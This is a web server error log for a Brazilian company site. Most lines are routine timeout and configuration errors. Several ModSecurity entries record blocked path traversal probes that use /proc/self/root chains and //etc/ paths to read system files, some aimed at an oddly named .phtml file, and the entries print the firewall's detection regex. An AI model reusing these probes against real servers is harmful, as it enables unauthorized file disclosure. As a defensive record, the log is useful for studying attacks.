[Thu Mar 19 18:48:32.025821 2026] [proxy_fcgi:error] [pid 27293:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:38930] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:48:37.100977 2026] [core:alert] [pid 5816:tid 140411565680384] [client 57.141.18.90:42246] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 18:48:54.127517 2026] [proxy_fcgi:error] [pid 17887:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:39458] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:49:00.570084 2026] [proxy_fcgi:error] [pid 5816:tid 140411674785536] [client 72.167.46.126:42688] AH01071: Got error 'Primary script unknown'
[Thu Mar 19 18:49:16.123326 2026] [proxy_fcgi:error] [pid 14269:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:39988] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:49:39.796659 2026] [core:alert] [pid 17887:tid 140411666392832] [client 57.141.18.97:43884] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 18:49:41.121819 2026] [proxy_fcgi:error] [pid 21563:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:40604] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:50:10.134311 2026] [proxy_fcgi:error] [pid 17887:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:41242] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:50:42.057237 2026] [:error] [pid 14269:tid 140411741927168] [client 74.7.228.61:59900] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abxvsgbLMZ6AikZjR9WGPwAAAAA"]
[Thu Mar 19 18:50:45.125867 2026] [proxy_fcgi:error] [pid 17653:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:42272] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:51:17.897947 2026] [mime_magic:error] [pid 17887:tid 140411624429312] (70014)End of file found: [client 57.141.18.49:46332] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 18:51:23.065929 2026] [proxy_fcgi:error] [pid 15826:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:43256] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:51:27.081881 2026] [:error] [pid 20435:tid 140411733534464] [client 74.7.243.128:52032] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxv35JaM1-0uhhUQJNDiwAAAIE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 18:51:47.171355 2026] [:error] [pid 8307:tid 140411649607424] [client 74.7.243.128:53778] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxv87-FhjpZGs9ba8qVtgAAAws"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 18:51:59.480148 2026] [proxy_fcgi:error] [pid 27293:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:44322] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:52:27.093883 2026] [proxy_fcgi:error] [pid 14269:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:45138] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:52:48.137804 2026] [proxy_fcgi:error] [pid 7545:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:45782] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:52:56.885426 2026] [:error] [pid 19655:tid 140411616036608] [client 74.7.243.128:34530] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxwOE1ujooLWdUDGy7_YQAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 18:52:57.314821 2026] [:error] [pid 17653:tid 140411733534464] [client 74.7.244.43:54670] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abxwOcdf6f5d65gmYZSkfgAAAsE"]
[Thu Mar 19 18:53:09.121947 2026] [proxy_fcgi:error] [pid 7235:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:46332] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:53:11.826109 2026] [core:alert] [pid 8307:tid 140411649607424] [client 74.7.243.128:41156] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/boot
[Thu Mar 19 18:53:31.781821 2026] [proxy_fcgi:error] [pid 8307:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:46914] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:53:54.126313 2026] [proxy_fcgi:error] [pid 7235:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:47612] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:53:57.277796 2026] [mime_magic:error] [pid 7893:tid 140411699963648] (70014)End of file found: [client 57.141.18.42:50138] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 18:53:59.624826 2026] [access_compat:error] [pid 17653:tid 140411733534464] [client 216.73.216.191:50179] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/goods.php
[Thu Mar 19 18:54:15.085836 2026] [proxy_fcgi:error] [pid 26799:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:48200] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:54:36.119970 2026] [proxy_fcgi:error] [pid 21219:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:48694] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:54:58.125909 2026] [proxy_fcgi:error] [pid 19655:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:49282] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:55:20.125799 2026] [proxy_fcgi:error] [pid 27293:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:49810] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:55:41.134758 2026] [proxy_fcgi:error] [pid 14269:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:50408] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:55:44.540347 2026] [:error] [pid 21563:tid 140411699963648] [client 74.7.228.61:35424] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abxw4Epm7ZmxKZTM4bZwqQAAA4U"]
[Thu Mar 19 18:56:03.135322 2026] [proxy_fcgi:error] [pid 19655:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:50926] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:56:22.919953 2026] [core:alert] [pid 7545:tid 140411666392832] [client 57.141.18.25:54000] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 18:56:28.122957 2026] [proxy_fcgi:error] [pid 26799:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:51390] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:56:29.831342 2026] [:error] [pid 30077:tid 140411599251200] [client 57.141.18.9:54104] [client 57.141.18.9] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors.lightbgcolor"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxDfu8EFLIOrSqIpvTYQAAAlE"]
[Thu Mar 19 18:56:30.365051 2026] [:error] [pid 30077:tid 140411599251200] [client 57.141.18.76:54118] [client 57.141.18.76] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc3.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxDvu8EFLIOrSqIpvTYgAAAlE"]
[Thu Mar 19 18:56:30.767140 2026] [:error] [pid 21563:tid 140411632822016] [client 57.141.18.100:54226] [client 57.141.18.100] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/csh.login"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxDkpm7ZmxKZTM4bZw3AAAA40"]
[Thu Mar 19 18:56:31.199271 2026] [:error] [pid 14269:tid 140411741927168] [client 57.141.18.29:54154] [client 57.141.18.29] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxDwbLMZ6AikZjR9WG1QAAAAA"]
[Thu Mar 19 18:56:32.627150 2026] [:error] [pid 26799:tid 140411716749056] [client 57.141.18.33:54272] [client 57.141.18.33] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxENa6ubjKNq_cu4Z_7wAAA0M"]
[Thu Mar 19 18:56:34.559175 2026] [:error] [pid 7235:tid 140411733534464] [client 57.141.18.103:54284] [client 57.141.18.103] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxEfqxLDW4GITHUkSTHQAAAQE"]
[Thu Mar 19 18:56:34.561369 2026] [:error] [pid 7235:tid 140411691570944] [client 57.141.18.109:54278] [client 57.141.18.109] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxEfqxLDW4GITHUkSTHgAAAQY"]
[Thu Mar 19 18:56:34.564268 2026] [:error] [pid 14269:tid 140411582465792] [client 57.141.18.116:54292] [client 57.141.18.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc1.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxEgbLMZ6AikZjR9WG2AAAABM"]
[Thu Mar 19 18:56:34.673810 2026] [:error] [pid 14269:tid 140411741927168] [client 57.141.18.96:54308] [client 57.141.18.96] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/shells"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxEgbLMZ6AikZjR9WG2wAAAAA"]
[Thu Mar 19 18:56:35.124022 2026] [:error] [pid 30077:tid 140411599251200] [client 57.141.18.14:54316] [client 57.141.18.14] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxE_u8EFLIOrSqIpvTZgAAAlE"]
[Thu Mar 19 18:56:35.688237 2026] [:error] [pid 5816:tid 140411548894976] [client 57.141.18.10:54326] [client 57.141.18.10] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/magic"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxE5fmNfuxceSuAEK_0QAAAdc"]
[Thu Mar 19 18:56:35.940159 2026] [:error] [pid 5816:tid 140411548894976] [client 57.141.18.59:54330] [client 57.141.18.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxE5fmNfuxceSuAEK_0gAAAdc"]
[Thu Mar 19 18:56:36.223745 2026] [:error] [pid 5816:tid 140411548894976] [client 57.141.18.2:54338] [client 57.141.18.2] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rpc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxFJfmNfuxceSuAEK_0wAAAdc"]
[Thu Mar 19 18:56:36.530541 2026] [:error] [pid 17887:tid 140411733534464] [client 57.141.18.46:54344] [client 57.141.18.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxFAkwaGbbGflqUZD2oAAAAME"]
[Thu Mar 19 18:56:37.253681 2026] [:error] [pid 17887:tid 140411733534464] [client 57.141.18.115:54358] [client 57.141.18.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxFQkwaGbbGflqUZD2oQAAAME"]
[Thu Mar 19 18:56:37.472027 2026] [:error] [pid 7893:tid 140411557287680] [client 57.141.18.15:54364] [client 57.141.18.15] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxFRCii7xarUs8iHYWUAAAAhY"]
[Thu Mar 19 18:56:37.880282 2026] [:error] [pid 8307:tid 140411699963648] [client 57.141.18.124:54366] [client 57.141.18.124] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/tcsd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxFb-FhjpZGs9ba8qV9QAAAwU"]
